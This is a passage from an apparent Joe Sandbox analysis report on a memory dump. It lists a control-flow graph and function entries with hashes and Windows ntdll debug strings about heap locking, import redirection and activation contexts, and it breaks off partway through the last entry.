                                                control_flow_graph 469 142d770-142d7ab 470 142d7b1-142d7bb 469->470 471 142d9e7-142d9ee 469->471 473 1479357 470->473 474 142d7c1-142d7ca 470->474 471->470 472 142d9f4-147932c 471->472 472->470 479 1479332-1479337 472->479 480 1479361-1479370 473->480 474->473 475 142d7d0-142d7d3 474->475 477 142d9da-142d9dc 475->477 478 142d7d9-142d7db 475->478 481 142d7e1-142d7e4 477->481 483 142d9e2 477->483 478->473 478->481 482 142d927-142d938 call 1454c30 479->482 484 147934b-1479354 call 149f290 480->484 481->473 485 142d7ea-142d7ed 481->485 483->485 484->473 488 142d7f3-142d7f6 485->488 489 142d9f9-142da02 485->489 492 142d7fc-142d848 call 142d660 488->492 493 142da0d-142da16 488->493 489->488 494 142da08-1479346 489->494 492->482 499 142d84e-142d852 492->499 493->492 497 142da1c 493->497 494->484 497->480 499->482 500 142d858-142d85f 499->500 501 142d9d1-142d9d5 500->501 502 142d865-142d869 500->502 503 1479563-147957b call 149f290 501->503 504 142d870-142d87a 502->504 503->482 504->503 505 142d880-142d887 504->505 508 142d889-142d88d 505->508 509 142d8ed-142d90d 505->509 511 142d893-142d898 508->511 512 1479372 508->512 510 142d910-142d913 509->510 513 142d915-142d918 510->513 514 142d93b-142d940 510->514 515 142d89e-142d8a5 511->515 516 1479379-147937b 511->516 512->516 519 142d91e-142d920 513->519 520 1479559-147955e 513->520 521 14794d3-14794db 514->521 522 142d946-142d949 514->522 517 142d8ab-142d8e3 call 1458250 515->517 518 14793ea-14793ed 515->518 516->515 523 1479381-14793aa 516->523 543 142d8e5-142d8e7 517->543 525 14793f1-1479400 call 14682c0 518->525 526 142d922 519->526 527 142d971-142d98c call 142a6e0 519->527 520->482 528 142da21-142da2f 521->528 529 14794e1-14794e5 521->529 522->528 530 142d94f-142d952 522->530 523->509 531 14793b0-14793ca call 14682c0 523->531 553 1479417 525->553 554 1479402-1479410 525->554 526->482 550 142d992-142d9ba 527->550 551 1479528-147952d 527->551 533 142d954-142d964 528->533 534 142da35-142da3e 528->534 529->528 538 14794eb-14794f4 529->538 530->513 530->533 531->543 548 14793d0-14793e3 531->548 533->513 539 142d966-142d96f 533->539 534->519 540 14794f6-14794f9 538->540 541 1479512-1479514 538->541 539->519 546 1479503-1479506 540->546 547 14794fb-1479501 540->547 541->528 552 147951a-1479523 541->552 543->509 549 1479420-1479424 543->549 555 147950f 546->555 556 1479508-147950d 546->556 547->541 548->531 557 14793e5 548->557 549->509 561 147942a-1479430 549->561 558 142d9bc-142d9be 550->558 551->558 559 1479533-1479536 551->559 552->519 553->549 554->525 560 1479412 554->560 555->541 556->552 557->509 562 142d9c4-142d9cb 558->562 563 1479549-147954e 558->563 559->558 564 147953c-1479544 559->564 560->509 565 1479457-1479460 561->565 566 1479432-147944f 561->566 562->501 562->504 563->482 569 1479554 563->569 564->510 567 14794a7-14794a9 565->567 568 1479462-1479467 565->568 566->565 570 1479451-1479454 566->570 572 14794cc-14794ce 567->572 573 14794ab-14794c6 call 1414508 567->573 568->567 571 1479469-147946d 568->571 569->520 570->565 574 1479475-14794a1 RtlDebugPrintTimes 571->574 575 147946f-1479473 571->575 572->482 573->482 573->572 574->567 579 14794a3 574->579 575->567 575->574 579->567
                                                APIs
                                                Strings
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01479346
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01479341, 01479366
                                                • GsHd, xrefs: 0142D874
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0147936B
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                • API String ID: 3446177414-576511823
                                                • Opcode ID: 92b0ed8e75cbcddee59aea27c8e349b50819c2ef5e32e62683a9c9776a96f27e
                                                • Instruction ID: 1b5e0afb3988791dc66a702e89fe2ce77439296cf68d0549edd27e3f601cbd40
                                                • Opcode Fuzzy Hash: 92b0ed8e75cbcddee59aea27c8e349b50819c2ef5e32e62683a9c9776a96f27e
                                                • Instruction Fuzzy Hash: 67E1C270A043128FDB20CF68C480B6BBBE5BF88318F44492EF9958B3A1D771D985CB42
                                                Function 0145B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                • Instruction ID: 0154d6d731da617b66861c25cc1a1dde4d17027a2e4274b541c017ad54fef975
                                                • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                • Instruction Fuzzy Hash: 89819F70E052499EEF658E6CC8917BEBBA3EF45320F18415BDC65A73A3C7349841CB61
                                                Function 01419126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$@
                                                • API String ID: 3446177414-1194432280
                                                • Opcode ID: 17921a362cd97078ec7942507823fe6be9de77c435b9c4f18faebc40fc68bbe3
                                                • Instruction ID: 72f38f03babd7d9b18a4eef076dbee068e144a983328d5f1fee1d66296062006
                                                • Opcode Fuzzy Hash: 17921a362cd97078ec7942507823fe6be9de77c435b9c4f18faebc40fc68bbe3
                                                • Instruction Fuzzy Hash: 96812871D002699BDB35CF54CC44BEABBB8AB18754F0441EBEA19B7290D7709E85CFA0
                                                Function 01454960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0IFw$0IFw$0IFw$X
                                                • API String ID: 3446177414-2496372868
                                                • Opcode ID: 434e090765ccd528b1c8ca796ff7cbb0968df46f560dec7e426273162e27add5
                                                • Instruction ID: c2262ad5459920fef75e76f4fc4a78f8c78ed6bfaaa23c18bcdaec2450f4256a
                                                • Opcode Fuzzy Hash: 434e090765ccd528b1c8ca796ff7cbb0968df46f560dec7e426273162e27add5
                                                • Instruction Fuzzy Hash: 64318131D0024AEBCFA2CF99D844B8E3BB1AB88754F05401EFD185E267E3709A94DF45
                                                Function 0143DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                • API String ID: 3446177414-56086060
                                                • Opcode ID: 374de5c1234b7452078a7764ae7023118de817c3c83f9b9104ff4397f919bb5b
                                                • Instruction ID: 98c1f518bdb6e1b02373fd9538fd86b435bdac9ef7ccfbe1750dfb8b5527dff1
                                                • Opcode Fuzzy Hash: 374de5c1234b7452078a7764ae7023118de817c3c83f9b9104ff4397f919bb5b
                                                • Instruction Fuzzy Hash: DE414631A00341DFD726DF69C488BAAB7E4EF98724F10816FD925877B1C774A889C791
                                                Function 01494755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01494888
                                                • LdrpCheckRedirection, xrefs: 0149488F
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01494899
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 3446177414-3154609507
                                                • Opcode ID: 31681c29dba6e719f53d88794904afe1b301150bed6e244b0bf70c4aab931c65
                                                • Instruction ID: 3562fa43e5c10fa2f46c860e1ce2258ddb1e03c97fff85faeba872017115716f
                                                • Opcode Fuzzy Hash: 31681c29dba6e719f53d88794904afe1b301150bed6e244b0bf70c4aab931c65
                                                • Instruction Fuzzy Hash: 7B41D036A142558FCF22CE59DA40A2B7FE4AF49A54B0A059FED589B371E330D802CB81
                                                Function 0143DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                • API String ID: 3446177414-3526935505
                                                • Opcode ID: 2ae8a10650f038d54584245d4400ad6d113691180d666454ec5a5eeefeb42dcd
                                                • Instruction ID: 4a90030243176ba3fb0682bb76c07e89670cd5d53b6e585882234ba8704c7db1
                                                • Opcode Fuzzy Hash: 2ae8a10650f038d54584245d4400ad6d113691180d666454ec5a5eeefeb42dcd
                                                • Instruction Fuzzy Hash: 7F314134654780DFD727DB69C809BA6BBE4EB15A14F04405BE8228B7B2C7B8A889C751
                                                Function 0140C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $
                                                • API String ID: 3446177414-3993045852
                                                • Opcode ID: bb636b953a854be14ca4bdeb289e7d928a96c6f12d3878d5f56849af655802ad
                                                • Instruction ID: de157ce275203c97c452a88a92dd060961a2d844deb0cc8d234c3d397cb801da
                                                • Opcode Fuzzy Hash: bb636b953a854be14ca4bdeb289e7d928a96c6f12d3878d5f56849af655802ad
                                                • Instruction Fuzzy Hash: FA11A132E00218EBCF16AF94E84869D7B71FF44324F10811AF82A6B2E4CB715E04DF41
                                                Function 0143EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a54584dd0b5048a3b80708b2631775508711f8ab6d31f4e497dd89094f112d8
                                                • Instruction ID: 5ebc2c6382e92d01502d2d283fc76fb161755f1595f7809bc7b2300ef93e3829
                                                • Opcode Fuzzy Hash: 5a54584dd0b5048a3b80708b2631775508711f8ab6d31f4e497dd89094f112d8
                                                • Instruction Fuzzy Hash: FBE1FE70D00608DFDF26CFA9D980AAEBBF1BF88314F24452AE556A7361D771A849CF11
                                                Function 0148EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: ee1854b7138ced829ad912661f2099b8ed54f7e63ad48d42baa6fe110a25d4bf
                                                • Instruction ID: fe0c816bdd3d2789fafd651aa8d4ee7d94d89b76b4644c968d7fdb35059a1c29
                                                • Opcode Fuzzy Hash: ee1854b7138ced829ad912661f2099b8ed54f7e63ad48d42baa6fe110a25d4bf
                                                • Instruction Fuzzy Hash: C7711571E00219AFDF05EFA8C984ADDBBF5BF49314F14402AEA05FB264D734A909CB64
                                                Function 0148F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: a6a2b8e7b3b4fd2d075d57f7e0b1ef596639e1a2ad90531da65f3f975dc2d555
                                                • Instruction ID: 85ac007fbd38301391d5718aa8d617e78ac39860cb8367ef2ab21a1f17bb4e4f
                                                • Opcode Fuzzy Hash: a6a2b8e7b3b4fd2d075d57f7e0b1ef596639e1a2ad90531da65f3f975dc2d555
                                                • Instruction Fuzzy Hash: B9513176E002199FDF09DF98D844ADDBBF1BF48314F18812AE915AB2A0D734A909CF54
                                                Function 01447B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                • String ID:
                                                • API String ID: 4281723722-0
                                                • Opcode ID: fca0dc33ffa29db55cceaa45c56eacf8ea1c348020ef79feae4b738b2cde135a
                                                • Instruction ID: 4a5bfaf3e2fdf61eda4f0db374b67e74f103e54606dce07bbc496bb01e611cd2
                                                • Opcode Fuzzy Hash: fca0dc33ffa29db55cceaa45c56eacf8ea1c348020ef79feae4b738b2cde135a
                                                • Instruction Fuzzy Hash: 6B314475E0021A9FCF22EFA8D885A9EBBF0BB58720F14412AE521BB3A4D7315D01DF54
                                                Function 014159C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 9fdf172c500915f5437f24a4e5dcad25a38a9b1c7f3f632272098d0eba6b7f24
                                                • Instruction ID: 7636aab0b7452b786cc346cb6e7f2632e19cbb7e17e24a67abbf17944942c2d0
                                                • Opcode Fuzzy Hash: 9fdf172c500915f5437f24a4e5dcad25a38a9b1c7f3f632272098d0eba6b7f24
                                                • Instruction Fuzzy Hash: 55327070D0026ADFDB21CF65C844BEEBBB0BF59314F0041EAD549AB265D7B49A85CF90
                                                Function 01457D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                • Instruction ID: adbe3334a3e7a2628b42210f38525c7f6514356d9f163a11b45f20c3e63dd390
                                                • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                • Instruction Fuzzy Hash: D191C571E002069BEFA4DF6EC8906BFBBA5AF44722F94452BED55A73E2D73089418710
                                                Function 0142D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
